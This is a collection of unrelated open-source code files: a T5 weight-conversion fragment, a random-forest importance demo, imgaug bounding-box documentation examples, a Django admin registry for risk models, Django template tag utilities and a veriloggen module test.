for index, var in enumerate(model.variables):
tf_transformers_model_index_dict[var.name] = index
# legacy_ai <-- hub
assigned_map = []
# assigned_map_values = []
for original_var, legacy_var in mapping_dict.items():
index = tf_transformers_model_index_dict[legacy_var]
# If not in mapping_dict, then mostly it is from attention layer
if "query/kernel:0" in legacy_var or "key/kernel:0" in legacy_var or "value/kernel:0" in legacy_var:
# hub (2D) to tf_transformers (3D)
model.variables[index].assign(
tf.reshape(
from_to_variable_dict.get(original_var),
(
config["embedding_size"],
config["num_attention_heads"],
config["attention_head_size"],
),
)
)
assigned_map.append((original_var, legacy_var))
continue
if (
original_var
== "tf_t5model/decoder/block_._0/layer_._1/EncDecAttention/relative_attention_bias/embeddings:0"
):
if original_var not in from_to_variable_dict:
model.variables[index].assign(tf.zeros_like(model.variables[index]))
assigned_map.append((original_var, legacy_var))
continue
model.variables[index].assign(from_to_variable_dict.get(original_var))
assigned_map.append((original_var, legacy_var))
if SKIP_ASSERT is False:
from transformers import T5Tokenizer
tokenizer = T5Tokenizer.from_pretrained(model_name)
text = "This is a long sentence to check how close models are."
inputs = tokenizer(text, return_tensors="tf")
outputs_hf = model_hf(inputs["input_ids"], decoder_input_ids=inputs["input_ids"])
outputs_hf = tf.reduce_sum(outputs_hf["last_hidden_state"], axis=-1).numpy()
inputs_tf = {}
inputs_tf["encoder_input_ids"] = inputs["input_ids"]
inputs_tf["encoder_input_mask"] = inputs["attention_mask"]
inputs_tf["decoder_input_ids"] = inputs["input_ids"]
outputs_tf = model(inputs_tf)
outputs_tf = tf.reduce_sum(outputs_tf["token_embeddings"], axis=-1).numpy()
if keras_utils.get_policy_name() == 'float32':
tf.debugging.assert_near(outputs_hf, outputs_tf, rtol=1.0)
|
test/__init__.py | cmutel/json2html | 236 | 12691370 | '''
Unit Test Cases for JSON2HTML
Description - python wrapper for converting JSON to HTML Table format
(c) 2013 <NAME>. MIT License
'''
__author__ = '<NAME>'
__version__ = '1.1.1'
__license__ = 'MIT'
|
scripts/demo.py | mathkann/understanding-random-forests | 353 | 12691374 | """
Understanding variable importances in forests of randomized trees.
<NAME>, <NAME>, <NAME> and <NAME>
NIPS, Lake Tahoe, United States, 2013
http://orbi.ulg.ac.be/handle/2268/155642
This demo reproduces Table 2 from the paper. It also shows that using Extra-
Trees from Scikit-Learn, or an ensemble of randomized ID3 trees (see ID3.py)
gives identical results.
Figure 2 from the paper can be obtained using the 2d array of importance values
yielded by a `RandomizedID3Ensemble` (see the commented code at the bottom).
Author: <NAME> <<EMAIL>>
License: BSD 3 clause
"""
import itertools
import numpy as np
from sklearn.utils import check_random_state
# Datasets ====================================================================
def make_led(irrelevant=0):
"""Generate exhaustively all samples from the 7-segment problem.
Parameters
----------
irrelevant : int, optional (default=0)
The number of irrelevant binary features to add. Since samples are
generated exhaustively, this makes the size of the resulting dataset
2^(irrelevant) times larger.
Returns
-------
X, y
"""
data = np.array([[0, 0, 1, 0, 0, 1, 0, 1],
[1, 0, 1, 1, 1, 0, 1, 2],
[1, 0, 1, 1, 0, 1, 1, 3],
[0, 1, 1, 1, 0, 1, 0, 4],
[1, 1, 0, 1, 0, 1, 1, 5],
[1, 1, 0, 1, 1, 1, 1, 6],
[1, 0, 1, 0, 0, 1, 0, 7],
[1, 1, 1, 1, 1, 1, 1, 8],
[1, 1, 1, 1, 0, 1, 1, 9],
[1, 1, 1, 0, 1, 1, 1, 0]])
X, y = np.array(data[:, :7], dtype=np.bool), data[:, 7]
if irrelevant > 0:
X_ = []
y_ = []
for i in xrange(10):
for s in itertools.product(range(2), repeat=irrelevant):
X_.append(np.concatenate((X[i], s)))
y_.append(i)
X = np.array(X_, dtype=np.bool)
y = np.array(y_)
return X, y
def make_led_sample(n_samples=200, irrelevant=0, random_state=None):
"""Generate random samples from the 7-segment problem.
Parameters
----------
n_samples : int, optional (default=200)
The number of samples to generate.
irrelevant : int, optional (default=0)
The number of irrelevant binary features to add.
Returns
-------
X, y
"""
random_state = check_random_state(random_state)
data = np.array([[0, 0, 1, 0, 0, 1, 0, 1],
[1, 0, 1, 1, 1, 0, 1, 2],
[1, 0, 1, 1, 0, 1, 1, 3],
[0, 1, 1, 1, 0, 1, 0, 4],
[1, 1, 0, 1, 0, 1, 1, 5],
[1, 1, 0, 1, 1, 1, 1, 6],
[1, 0, 1, 0, 0, 1, 0, 7],
[1, 1, 1, 1, 1, 1, 1, 8],
[1, 1, 1, 1, 0, 1, 1, 9],
[1, 1, 1, 0, 1, 1, 1, 0]])
data = data[random_state.randint(0, 10, n_samples)]
X, y = np.array(data[:, :7], dtype=np.bool), data[:, 7]
if irrelevant > 0:
X = np.hstack((X, random_state.rand(n_samples, irrelevant) > 0.5))
return X, y
# Formulae ====================================================================
from gmpy import comb
def binomial(k, n):
"""Return the number of combinations of k elements among a collection of
size n."""
if k < 0:
return 0
elif k > n:
return 0
else:
return comb(int(n), int(k))
def entropy(X):
"""Return the entropy (in base 2) of a discrete variable X, encoded as a
1d array."""
e = 0.
n_samples = len(X)
for count in np.bincount(X):
p = 1. * count / n_samples
if p > 0:
e -= p * np.log2(p)
return e
def mdi_importance(X_m, X, y):
"""The MDI importance of X_m for Y, as computed with an infinite ensemble
of fully developed totally randomized trees.
This is a direct implementation of Equation 3 from the paper.
Parameters
----------
X_m : int
The variable for which the importance is computed. It corresponds
to the column in X (from 0 to p-1).
X : array of shape (N, p)
The input data (X_0, X_1, ... X_{p-1}). X should be large enough
to accurately represent the actual data distribution.
y : array of shape (N,)
The Y variable.
Returns
-------
imp : array of size (p,)
The decomposition of the importance of X_m along its degree of
        interaction with the other input variables, i.e. the p outer terms
        in Equation 3. The actual importance Imp(X_m) amounts to np.sum(imp).
"""
n_samples, p = X.shape
variables = range(p)
variables.pop(X_m)
imp = np.zeros(p)
values = []
for i in xrange(p):
values.append(np.unique(X[:, i]))
for k in xrange(p):
# Weight of each B of size k
coef = 1. / (binomial(k, p) * (p - k))
# For all B of size k
for B in itertools.combinations(variables, k):
# For all values B=b
for b in itertools.product(*[values[B[j]] for j in xrange(k)]):
mask_b = np.ones(n_samples, dtype=np.bool)
for j in xrange(k):
mask_b &= X[:, B[j]] == b[j]
X_, y_ = X[mask_b, :], y[mask_b]
n_samples_b = len(X_)
if n_samples_b > 0:
children = []
for xi in values[X_m]:
mask_xi = X_[:, X_m] == xi
children.append(y_[mask_xi])
imp[k] += (coef
* (1. * n_samples_b / n_samples) # P(B=b)
* (entropy(y_) -
sum([entropy(c) * len(c) / n_samples_b
for c in children])))
return imp
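# Editor's note -- a minimal, hypothetical illustration of the function above
# (kept as a comment so the demo below is unchanged): the importance of the
# first segment on the noise-free 7-segment data, decomposed by interaction
# degree k, with its sum giving Imp(X_0) from Equation 3.
#
#     X_demo, y_demo = make_led()
#     imp = mdi_importance(0, X_demo, y_demo)
#     print imp, imp.sum()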
# Demo ========================================================================
if __name__ == "__main__":
# Generate data
n_trees = 5000
X, y = make_led()
p = X.shape[1]
results = np.empty((p, p + 1))
# Theoretical values
for i in range(p):
results[i, 0] = sum(mdi_importance(i, X, y))
# Empirical results
for i in range(p):
# Using scikit-learn
from sklearn.ensemble import ExtraTreesClassifier
clf = ExtraTreesClassifier(n_estimators=n_trees,
max_features=i + 1,
criterion="entropy",
n_jobs=-1).fit(X, y)
# Note: Variable importances in Scikit-Learn are normalized by
# default. Use normalize=False to disable normalization.
results[:, i + 1] = sum(tree.tree_.compute_feature_importances(normalize=False)
for tree in clf.estimators_) / clf.n_estimators
# # Using a simplistic (but slower) randomized ID3 tree classifier
# from ID3 import RandomizedID3Classifier, RandomizedID3Ensemble
# clf = RandomizedID3Ensemble(n_estimators=n_trees,
# base_estimator=RandomizedID3Classifier(k=i + 1)).fit(X, y)
# # Note: Here clf.feature_importances is a 2d array of shape (p, p).
# # In particular, it could be used to regenerate Figure 2 from
# # the paper.
# results[:, i + 1] = np.sum(clf.feature_importances_, axis=1)
# Print results
print "Table 2:"
print "Variable importances as computed with an ensemble of randomized " \
"trees, for increasing values of $K$. Importances at $K=1$ follow " \
"their theoretical values, as predicted by Equation 3 in Theorem 1. " \
"However, as $K$ increases, importances diverge due to masking " \
"effects. In accordance with Theorem 2, their sum is also always " \
"equal to $I(X_{1}, ..., X_{7}; Y) = H(Y) = log2(10)= 3.321$ " \
"since inputs allow to perfectly predict the output."
print
print "\tEqn.3",
for m in range(p):
print "\tK=%d" % (m + 1),
print
for m in range(p):
print "X_%d" % (m + 1),
for j in range(p + 1):
print "\t%.4f" % results[m, j],
print
print "Sum",
for j in range(p + 1):
print "\t%.4f" % sum(results[:, j]),
|
CalibMuon/Configuration/python/CSC_FakeDBConditions_cff.py | ckamtsikis/cmssw | 852 | 12691390 | <filename>CalibMuon/Configuration/python/CSC_FakeDBConditions_cff.py
import FWCore.ParameterSet.Config as cms
from CalibMuon.CSCCalibration.CSCFakeDBGains_cfi import *
from CalibMuon.CSCCalibration.CSCFakeDBPedestals_cfi import *
from CalibMuon.CSCCalibration.CSCFakeDBNoiseMatrix_cfi import *
from CalibMuon.CSCCalibration.CSCFakeDBCrosstalk_cfi import *
from CalibMuon.CSCCalibration.CSC_BadChambers_cfi import *
|
scripts/generate_rtd_images/gen_bounding_boxes.py | marsbroshok/imgaug-doc | 134 | 12691398 | <reponame>marsbroshok/imgaug-doc<filename>scripts/generate_rtd_images/gen_bounding_boxes.py
from __future__ import print_function, division
from .utils import save, grid
def main():
"""Generate all example images for the chapter `Examples: Bounding Boxes`
in the documentation."""
chapter_examples_bounding_boxes_simple()
chapter_examples_bounding_boxes_rotation()
chapter_examples_bounding_boxes_ooi()
chapter_examples_bounding_boxes_shift()
chapter_examples_bounding_boxes_projection()
chapter_examples_bounding_boxes_iou()
def chapter_examples_bounding_boxes_simple():
import imgaug as ia
import imgaug.augmenters as iaa
from imgaug.augmentables.bbs import BoundingBox, BoundingBoxesOnImage
ia.seed(1)
image = ia.quokka(size=(256, 256))
bbs = BoundingBoxesOnImage([
BoundingBox(x1=65, y1=100, x2=200, y2=150),
BoundingBox(x1=150, y1=80, x2=200, y2=130)
], shape=image.shape)
seq = iaa.Sequential([
iaa.Multiply((1.2, 1.5)), # change brightness, doesn't affect BBs
iaa.Affine(
translate_px={"x": 40, "y": 60},
scale=(0.5, 0.7)
) # translate by 40/60px on x/y axis, and scale to 50-70%, affects BBs
])
# Augment BBs and images.
image_aug, bbs_aug = seq(image=image, bounding_boxes=bbs)
# print coordinates before/after augmentation (see below)
# use .x1_int, .y_int, ... to get integer coordinates
for i in range(len(bbs.bounding_boxes)):
before = bbs.bounding_boxes[i]
after = bbs_aug.bounding_boxes[i]
print("BB %d: (%.4f, %.4f, %.4f, %.4f) -> (%.4f, %.4f, %.4f, %.4f)" % (
i,
before.x1, before.y1, before.x2, before.y2,
after.x1, after.y1, after.x2, after.y2)
)
# image with BBs before/after augmentation (shown below)
image_before = bbs.draw_on_image(image, size=2)
image_after = bbs_aug.draw_on_image(image_aug, size=2, color=[0, 0, 255])
# ------------
save(
"examples_bounding_boxes",
"simple.jpg",
grid([image_before, image_after], cols=2, rows=1),
quality=90
)
def chapter_examples_bounding_boxes_rotation():
import imgaug as ia
from imgaug import augmenters as iaa
ia.seed(1)
image = ia.quokka(size=(256, 256))
bbs = ia.BoundingBoxesOnImage([
ia.BoundingBox(x1=65, y1=100, x2=200, y2=150),
ia.BoundingBox(x1=150, y1=80, x2=200, y2=130)
], shape=image.shape)
seq = iaa.Sequential([
iaa.Multiply((1.2, 1.5)), # change brightness, doesn't affect BBs
iaa.Affine(
rotate=45,
)
])
# Make our sequence deterministic.
# We can now apply it to the image and then to the BBs and it will
# lead to the same augmentations.
# IMPORTANT: Call this once PER BATCH, otherwise you will always get the
# exactly same augmentations for every batch!
seq_det = seq.to_deterministic()
# Augment BBs and images.
# As we only have one image and list of BBs, we use
# [image] and [bbs] to turn both into lists (batches) for the
# functions and then [0] to reverse that. In a real experiment, your
# variables would likely already be lists.
image_aug = seq_det.augment_images([image])[0]
bbs_aug = seq_det.augment_bounding_boxes([bbs])[0]
# print coordinates before/after augmentation (see below)
for i in range(len(bbs.bounding_boxes)):
before = bbs.bounding_boxes[i]
after = bbs_aug.bounding_boxes[i]
print("BB %d: (%d, %d, %d, %d) -> (%d, %d, %d, %d)" % (
i,
before.x1, before.y1, before.x2, before.y2,
after.x1, after.y1, after.x2, after.y2)
)
# image with BBs before/after augmentation (shown below)
image_before = bbs.draw_on_image(image, size=2)
image_after = bbs_aug.draw_on_image(image_aug, size=2, color=[0, 0, 255])
# ------------
save(
"examples_bounding_boxes",
"rotation.jpg",
grid([image_before, image_after], cols=2, rows=1),
quality=90
)
def chapter_examples_bounding_boxes_ooi():
import numpy as np
import imgaug as ia
import imgaug.augmenters as iaa
from imgaug.augmentables.bbs import BoundingBox, BoundingBoxesOnImage
ia.seed(1)
GREEN = [0, 255, 0]
ORANGE = [255, 140, 0]
RED = [255, 0, 0]
# Pad image with a 1px white and (BY-1)px black border
def pad(image, by):
image_border1 = ia.pad(image, top=1, right=1, bottom=1, left=1,
mode="constant", cval=255)
image_border2 = ia.pad(image_border1, top=by-1, right=by-1,
bottom=by-1, left=by-1,
mode="constant", cval=0)
return image_border2
# Draw BBs on an image
# and before doing that, extend the image plane by BORDER pixels.
# Mark BBs inside the image plane with green color, those partially inside
# with orange and those fully outside with red.
def draw_bbs(image, bbs, border):
image_border = pad(image, border)
for bb in bbs.bounding_boxes:
if bb.is_fully_within_image(image.shape):
color = GREEN
elif bb.is_partly_within_image(image.shape):
color = ORANGE
else:
color = RED
image_border = bb.shift(left=border, top=border)\
.draw_on_image(image_border, size=2, color=color)
return image_border
# Define example image with three small square BBs next to each other.
# Augment these BBs by shifting them to the right.
image = ia.quokka(size=(256, 256))
bbs = BoundingBoxesOnImage([
BoundingBox(x1=25, x2=75, y1=25, y2=75),
BoundingBox(x1=100, x2=150, y1=25, y2=75),
BoundingBox(x1=175, x2=225, y1=25, y2=75)
], shape=image.shape)
seq = iaa.Affine(translate_px={"x": 120})
image_aug, bbs_aug = seq(image=image, bounding_boxes=bbs)
# Draw the BBs (a) in their original form, (b) after augmentation,
# (c) after augmentation and removing those fully outside the image,
# (d) after augmentation and removing those fully outside the image and
# clipping those partially inside the image so that they are fully inside.
image_before = draw_bbs(image, bbs, 100)
image_after1 = draw_bbs(image_aug, bbs_aug, 100)
image_after2 = draw_bbs(image_aug, bbs_aug.remove_out_of_image(), 100)
image_after3 = draw_bbs(image_aug, bbs_aug.remove_out_of_image().clip_out_of_image(), 100)
# ------------
save(
"examples_bounding_boxes",
"ooi.jpg",
grid([image_before, image_after1, np.zeros_like(image_before), image_after2, np.zeros_like(image_before), image_after3], cols=2, rows=3),
#grid([image_before, image_after1], cols=2, rows=1),
quality=90
)
def chapter_examples_bounding_boxes_shift():
import imgaug as ia
from imgaug.augmentables.bbs import BoundingBox, BoundingBoxesOnImage
ia.seed(1)
# Define image and two bounding boxes
image = ia.quokka(size=(256, 256))
bbs = BoundingBoxesOnImage([
BoundingBox(x1=25, x2=75, y1=25, y2=75),
BoundingBox(x1=100, x2=150, y1=25, y2=75)
], shape=image.shape)
# Move both BBs 25px to the right and the second BB 25px down
bbs_shifted = bbs.shift(left=25)
bbs_shifted.bounding_boxes[1] = bbs_shifted.bounding_boxes[1].shift(top=25)
# Draw images before/after moving BBs
image = bbs.draw_on_image(image, color=[0, 255, 0], size=2, alpha=0.75)
image = bbs_shifted.draw_on_image(image, color=[0, 0, 255], size=2, alpha=0.75)
# ------------
save(
"examples_bounding_boxes",
"shift.jpg",
grid([image], cols=1, rows=1),
quality=90
)
def chapter_examples_bounding_boxes_projection():
import imgaug as ia
from imgaug.augmentables.bbs import BoundingBox, BoundingBoxesOnImage
ia.seed(1)
# Define image with two bounding boxes
image = ia.quokka(size=(256, 256))
bbs = BoundingBoxesOnImage([
BoundingBox(x1=25, x2=75, y1=25, y2=75),
BoundingBox(x1=100, x2=150, y1=25, y2=75)
], shape=image.shape)
# Rescale image and bounding boxes
image_rescaled = ia.imresize_single_image(image, (512, 512))
bbs_rescaled = bbs.on(image_rescaled)
# Draw image before/after rescaling and with rescaled bounding boxes
image_bbs = bbs.draw_on_image(image, size=2)
image_rescaled_bbs = bbs_rescaled.draw_on_image(image_rescaled, size=2)
# ------------
save(
"examples_bounding_boxes",
"projection.jpg",
grid([image_bbs, image_rescaled_bbs], cols=2, rows=1),
quality=90
)
def chapter_examples_bounding_boxes_iou():
import numpy as np
import imgaug as ia
from imgaug.augmentables.bbs import BoundingBox
ia.seed(1)
# Define image with two bounding boxes.
image = ia.quokka(size=(256, 256))
bb1 = BoundingBox(x1=50, x2=100, y1=25, y2=75)
bb2 = BoundingBox(x1=75, x2=125, y1=50, y2=100)
# Compute intersection, union and IoU value
# Intersection and union are both bounding boxes. They are here
# decreased/increased in size purely for better visualization.
bb_inters = bb1.intersection(bb2).extend(all_sides=-1)
bb_union = bb1.union(bb2).extend(all_sides=2)
iou = bb1.iou(bb2)
# Draw bounding boxes, intersection, union and IoU value on image.
image_bbs = np.copy(image)
image_bbs = bb1.draw_on_image(image_bbs, size=2, color=[0, 255, 0])
image_bbs = bb2.draw_on_image(image_bbs, size=2, color=[0, 255, 0])
image_bbs = bb_inters.draw_on_image(image_bbs, size=2, color=[255, 0, 0])
image_bbs = bb_union.draw_on_image(image_bbs, size=2, color=[0, 0, 255])
image_bbs = ia.draw_text(
image_bbs, text="IoU=%.2f" % (iou,),
x=bb_union.x2+10, y=bb_union.y1+bb_union.height//2,
color=[255, 255, 255], size=13
)
# ------------
save(
"examples_bounding_boxes",
"iou.jpg",
grid([image_bbs], cols=1, rows=1),
quality=90
)
if __name__ == "__main__":
main()
|
risk/admin.py | dekoder/LogESP | 130 | 12691400 | <gh_stars>100-1000
from django.contrib import admin
# Register your models here.
from .models import AdvThreatSrcCategory, AdvThreatSrcType
from .models import AdvThreatSource
from .models import NonAdvThreatSrcClass, NonAdvThreatSrcCategory
from .models import NonAdvThreatSrcType, NonAdvThreatSource
from .models import AdvThreatEventCategory, AdvThreatEventType
from .models import NonAdvThreatEventType
from .models import AdvThreatEvent, NonAdvThreatEvent
from .models import VulnerabilityClass, VulnerabilityCategory, VulnerabilityType
from .models import ConditionClass, ConditionCategory, ConditionType
from .models import Vulnerability, RiskCondition
from .models import ImpactType, Impact
from .models import RiskResponseType, RiskResponse
admin.site.register(AdvThreatEventCategory)
admin.site.register(AdvThreatEventType)
admin.site.register(AdvThreatEvent)
admin.site.register(NonAdvThreatEventType)
admin.site.register(NonAdvThreatEvent)
admin.site.register(AdvThreatSrcCategory)
admin.site.register(AdvThreatSrcType)
admin.site.register(AdvThreatSource)
admin.site.register(NonAdvThreatSrcClass)
admin.site.register(NonAdvThreatSrcCategory)
admin.site.register(NonAdvThreatSrcType)
admin.site.register(NonAdvThreatSource)
admin.site.register(VulnerabilityClass)
admin.site.register(VulnerabilityCategory)
admin.site.register(VulnerabilityType)
admin.site.register(ConditionClass)
admin.site.register(ConditionCategory)
admin.site.register(ConditionType)
admin.site.register(Vulnerability)
admin.site.register(RiskCondition)
admin.site.register(ImpactType)
admin.site.register(Impact)
admin.site.register(RiskResponseType)
admin.site.register(RiskResponse)
|
templatetags/htk_tags.py | goztrk/django-htk | 206 | 12691417 | <reponame>goztrk/django-htk
# Python Standard Library Imports
import base64
import datetime
import json
import re
# Third Party (PyPI) Imports
import six.moves.urllib as urllib
# Django Imports
from django import template
from django.template.defaultfilters import stringfilter
from django.urls import reverse
from django.utils.safestring import SafeText
from django.utils.safestring import mark_safe
register = template.Library()
##################################################
# Filters
# Form Utilities
@register.filter()
def field_clsname(field):
clsname = field.field.widget.__class__.__name__
return clsname
@register.filter(is_safe=True)
def label_with_classes(value, arg):
attrs = {
'class': arg,
'className': arg,
}
html = value.label_tag(attrs=attrs)
return html
@register.filter(is_safe=True)
def react_field(field):
html = field.__str__()
html = re.sub(r' value="(.*?)"', r' defaultValue="\g<1>"', html)
html = re.sub(r' class="(.*?)"', r' className="\g<1>"', html)
if field.field.widget.__class__.__name__ == 'RadioSelect':
html = re.sub(r'checked="checked"', r'defaultChecked', html)
html = mark_safe(html)
return html
# Dictionary Utilities
@register.filter()
def get_item(dictionary, key):
value = dictionary.get(key)
return value
# String Utilities
@register.filter(is_safe=True)
def concat(value, arg):
result = str(value) + str(arg)
return result
@register.filter()
def zeropad(value, num_digits):
"""
"""
padded = str(value).zfill(num_digits)
return padded
@register.filter(is_safe=True)
def markdownify(value):
"""Converts Markdown string to HTML
"""
import markdown
html = markdown.markdown(value)
return html
@register.filter()
def atob(value):
"""Base64 decode
ASCII to Binary
"""
value = base64.b64decode(value)
return value
@register.filter()
def btoa(value):
"""Base64 encode
Binary to ASCII
"""
if type(value) in (str, SafeText):
value = value.encode('utf-8')
# Convert bytes to str for for use in template
value = base64.b64encode(value).decode('utf-8')
return value
# Maths
@register.filter()
def int_divide(value, arg):
return int(value) / int(arg)
@register.filter()
def float_divide(value, arg):
return 1.0 * int(value) / int(arg)
@register.filter()
def make_range(value):
return range(value)
# Formatters
@register.filter()
def currency(value):
from decimal import Decimal
value = Decimal(value).quantize(Decimal('0.01'))
return value
@register.filter()
def currency_symbol(value, symbol):
if len(value) > 0 and value[0] == '-':
sign = '-'
abs_value = value[1:]
else:
sign = ''
abs_value = value
result = '%s%s%s' % (sign, symbol, abs_value,)
return result
@register.filter()
def timestamp(value):
try:
formatted = datetime.datetime.fromtimestamp(value)
except AttributeError:
formatted = ''
return formatted
@register.filter()
def phonenumber(value, country='US'):
"""Formats a phone number for a country
"""
import phonenumbers
try:
formatted = phonenumbers.format_number(phonenumbers.parse(value, country), phonenumbers.PhoneNumberFormat.NATIONAL)
except:
formatted = value
return formatted
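# Editor's illustrative template usage for the formatter filters above; the
# context variables (`order.total`, `contact.phone`, `invoice_no`) are
# hypothetical and shown only to demonstrate the filter syntax:
#
#   {% load htk_tags %}
#   {{ order.total|currency }}            {# e.g. 12.50 #}
#   {{ contact.phone|phonenumber:"US" }}  {# e.g. (415) 555-0100 #}
#   {{ invoice_no|zeropad:6 }}            {# e.g. 000042 #}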
@register.filter(is_safe=True)
def obfuscate(value):
"""Obfuscates a string
"""
from htk.utils.obfuscate import html_obfuscate_string
result = html_obfuscate_string(value)
return result
@register.filter(is_safe=True)
def obfuscate_mailto(value, text=False):
"""Obfuscates a mailto link
"""
from htk.utils.obfuscate import html_obfuscate_string
email = html_obfuscate_string(value)
if text:
link_text = text
else:
link_text = email
result = '<a href="%s%s">%s</a>' % (
html_obfuscate_string('mailto:'),
email,
link_text,
)
return result
# Oembed
@register.filter(is_safe=True)
def oembed(value, autoplay=False):
from htk.lib.oembed.utils import get_oembed_html
html = get_oembed_html(value, autoplay=autoplay)
html = mark_safe(html)
return html
# Javascript-related
@register.filter()
def jsbool(value):
js_value = 'true' if bool(value) else 'false'
return js_value
@register.filter()
def jsondumps(value):
js_value = mark_safe(json.dumps(value))
return js_value
# Requests
@register.filter()
def http_header(value):
"""Converts Django HTTP headers to standard format
e.g.
HTTP_ACCEPT -> Accept
HTTP_CACHE_CONTROL -> Cache-Control
"""
parts = value.split('_')
header_parts = [part.title() for part in parts[1:]]
formatted = '-'.join(header_parts)
return formatted
##################################################
# Tags
@register.simple_tag(takes_context=True)
def get_django_setting(context, key):
"""Retrieves a Django setting and sets it on the context dictionary
"""
from django.conf import settings
if hasattr(settings, key):
value = getattr(settings, key)
context[key] = value
return ''
@register.simple_tag()
def htk_setting(key):
from htk.utils import htk_setting as _htk_setting
value = _htk_setting(key)
return value
@register.simple_tag()
def get_request_duration():
from htk.middleware.classes import RequestTimerMiddleware
timer = RequestTimerMiddleware.get_current_timer()
if timer:
duration = timer.duration()
else:
# TODO: fix get_current_timer()
duration = 0
return duration
##
# Load Assets
@register.simple_tag(takes_context=True)
def lesscss(context, css_file_path_base, media=None):
"""Determine whether to use LESS compilation on-the-fly or CSS files, and includes the appropriate one
"""
media = 'media="%s" ' % media if media else ''
values = {
'css_rel' : context.get('css_rel', 'stylesheet'),
'css_ext' : context.get('css_ext', 'css'),
'css_file_path_base' : css_file_path_base,
'media' : media,
}
html = '<link type="text/css" rel="%(css_rel)s" href="%(css_file_path_base)s.%(css_ext)s" %(media)s/>' % values
html = mark_safe(html)
return html
@register.simple_tag(takes_context=True)
def loadjs(context, js_file_path, jsx=False):
"""Include a JS file and append a static asset version string
"""
asset_version = context.get('asset_version')
if asset_version:
asset_version_str = '?v=%s' % asset_version
else:
asset_version_str = ''
values = {
'script_type' : 'text/babel' if jsx else 'text/javascript',
'js_file_path' : js_file_path,
'asset_version_str' : asset_version_str,
}
html = '<script type="%(script_type)s" src="%(js_file_path)s%(asset_version_str)s"></script>' % values
html = mark_safe(html)
return html
@register.simple_tag(takes_context=True)
def loadjsx(context, js_file_path):
html = loadjs(context, js_file_path, jsx=True)
return html
##
# Feature Flags
@register.simple_tag()
def is_feature_enabled(feature_name):
from htk.apps.features.utils import is_feature_enabled as _is_feature_enabled
is_enabled = _is_feature_enabled(feature_name)
return is_enabled
##
# ACL Tags
@register.simple_tag(takes_context=True)
def is_editable_by_context_user(context, obj):
user = context.get('user', None)
if user:
is_editable = obj.is_editable_by(user)
else:
is_editable = False
return is_editable
@register.simple_tag(takes_context=True)
def has_permission(context, permission_key):
request = context.get('request', {}).get('request', None)
user = request.user
if request and user.is_authenticated:
has_permission = user.has_perm(permission_key)
else:
has_permission = False
return has_permission
##
# Organizations
@register.simple_tag(takes_context=True)
def is_user_organization_owner(context, organization):
user = context.get('user', None)
if user:
is_owner = organization.has_owner(user)
else:
is_owner = False
return is_owner
@register.simple_tag(takes_context=True)
def is_user_organization_admin(context, organization):
user = context.get('user', None)
if user:
is_admin = organization.has_admin(user)
else:
is_admin = False
return is_admin
@register.simple_tag(takes_context=True)
def is_user_organization_member(context, organization):
user = context.get('user', None)
if user:
is_member = organization.has_member(user)
else:
is_member = False
return is_member
##
# Geolocations
@register.simple_tag()
def distance_from(obj, lat, lng, unit='mile'):
from htk.apps.geolocations.enums import DistanceUnit
from htk.apps.geolocations.models import AbstractGeolocation
if not isinstance(obj, AbstractGeolocation) and not hasattr(obj, 'distance_from'):
raise Exception('Not a Geolocation object or does not have a distance_from method')
distance_unit_map = {
'meter' : DistanceUnit.METER,
'kilometer' : DistanceUnit.KILOMETER,
'feet' : DistanceUnit.FEET,
'mile' : DistanceUnit.MILE,
}
distance_unit = distance_unit_map.get(unit)
if distance_unit is None:
raise Exception('Unknown distance unit: %s' % unit)
distance = obj.distance_from(lat, lng, distance_unit=distance_unit)
return distance
##
# Util Tags
@register.simple_tag()
def qrcode_image_url(qr_data):
"""Returns the URL to the QR Code image of `qr_data`
"""
if qr_data:
from htk.lib.qrcode.utils import generate_qr_key
from htk.utils import htk_setting
url_name = htk_setting('HTK_QR_IMAGE_URL_NAME')
if url_name:
qr_params = urllib.parse.urlencode(
{
'key': generate_qr_key(qr_data),
'data': qr_data,
}
)
image_url = '%s?%s' % (reverse(url_name), qr_params,)
else:
image_url = None
else:
image_url = None
return image_url
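# Editor's illustrative template usage (the `ticket.code` variable is
# hypothetical); it assumes HTK_QR_IMAGE_URL_NAME is configured, as checked above:
#
#   {% load htk_tags %}
#   <img src="{% qrcode_image_url ticket.code %}" alt="QR code" />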
@register.simple_tag()
def credit_card_icon(credit_card_brand):
from htk.constants.icons import CREDIT_CARD_ICONS
from htk.constants.icons import DEFAULT_CREDIT_CARD_ICON
if credit_card_brand in CREDIT_CARD_ICONS:
credit_card_icon = CREDIT_CARD_ICONS[credit_card_brand]
else:
credit_card_icon = DEFAULT_CREDIT_CARD_ICON
return credit_card_icon
|
tests/extension/resolver_/nested_module/resolver_nested_module.py | akmaru/veriloggen | 232 | 12691426 | <filename>tests/extension/resolver_/nested_module/resolver_nested_module.py
from __future__ import absolute_import
from __future__ import print_function
import sys
import os
# the next line can be removed after installation
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))))
from veriloggen import *
import veriloggen.resolver.resolver as resolver
def mkSubLed():
m = Module('sub_blinkled')
width = m.Parameter('WIDTH', 8)
inc = m.Parameter('INC', 1)
clk = m.Input('CLK')
rst = m.Input('RST')
led = m.OutputReg('LED', width)
count = m.Reg('count', width + 10)
m.Always(Posedge(clk))(
If(rst)(
count(0)
).Else(
If(count == 1023)(
count(0)
).Else(
count(count + inc)
)
))
m.Always(Posedge(clk))(
If(rst)(
led( 0 )
).Else(
If(count == 1023)(
led(led + inc)
)
))
return m
def mkOrigLed():
m = Module('blinkled')
sub = mkSubLed()
width = m.Parameter('TOP_WIDTH', 16)
inc = m.Parameter('TOP_INC', 1)
clk = m.Input('CLK')
rst = m.Input('RST')
led0 = m.Output('LED0', width)
led1 = m.Output('LED1', width)
m.Instance(sub, 'inst_sub_blinkled_0',
params=[('WIDTH', width), ('INC', inc + 1)],
ports=[('CLK', clk), ('RST', rst), ('LED', led0)])
m.Instance(sub, 'inst_sub_blinkled_1',
params=[('WIDTH', width), ('INC', inc + 2)],
ports=[('CLK', clk), ('RST', rst), ('LED', led1)])
return m
def mkLed():
led = mkOrigLed()
return resolver.resolve(led)
if __name__ == '__main__':
led = mkLed()
verilog = led.to_verilog()
print(verilog)
|
social_rl/multiagent_tfagents/joint_attention/joint_attention_train_eval.py | DionysisChristopoulos/google-research | 23,901 | 12691478 | <filename>social_rl/multiagent_tfagents/joint_attention/joint_attention_train_eval.py
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
